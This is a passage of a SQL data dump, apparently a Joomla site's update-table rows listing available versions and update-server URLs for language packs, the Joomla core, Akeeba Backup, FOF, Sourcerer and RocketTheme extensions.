US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4824,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4825,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4826,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4827,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4828,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4829,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4830,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4831,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4832,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4833,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4834,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4835,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4836,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4837,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4838,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4839,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4840,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4841,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4842,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4843,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4844,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4845,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4846,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4847,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4848,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4849,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4850,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4851,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4852,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4853,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4854,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4855,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4856,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4857,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4858,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4859,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4860,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4861,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4862,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4863,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4864,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4865,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4866,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4867,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4868,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4869,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4870,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4871,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4872,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4873,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4874,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4875,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4876,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4877,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4878,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4879,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4880,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4881,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4882,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4883,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4884,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4885,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4886,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4887,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4888,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4889,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4890,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4891,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4892,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4893,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4894,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4895,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4896,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4897,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4898,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4899,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4900,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(4901,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4902,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(4903,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4904,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4905,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(4907,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4908,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4909,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4910,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4911,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4912,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4913,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4914,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4915,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4916,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4917,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4918,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4919,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4920,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4921,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4922,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4923,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4924,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4925,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4926,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4927,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4928,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4929,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4930,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4931,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4932,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4933,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4934,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4935,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4936,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4937,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4938,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4939,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4940,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4941,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4942,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4943,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4944,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4945,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4946,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4947,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4948,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4949,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4950,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4951,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4952,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4953,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4954,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4955,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4956,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4957,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4958,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4959,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4960,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4961,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4962,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4963,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4964,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4965,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4966,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4967,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4968,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4969,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4970,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4971,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4972,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4973,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4974,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4975,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4976,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4977,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4978,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4979,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4980,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4981,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4982,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4983,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4984,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4985,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4986,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4987,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4988,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4989,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4990,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4991,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4992,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4993,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4994,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4995,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4996,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4997,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4998,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4999,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5000,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5001,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5002,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5003,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5004,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5005,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5006,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5007,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5008,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5009,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5010,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5011,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5012,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5013,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5014,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5015,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5016,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5017,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5018,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5019,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5020,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5021,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5022,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5023,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5024,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5025,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5026,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5027,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5028,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5029,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5030,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5031,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5032,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5033,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5034,57,0,'English 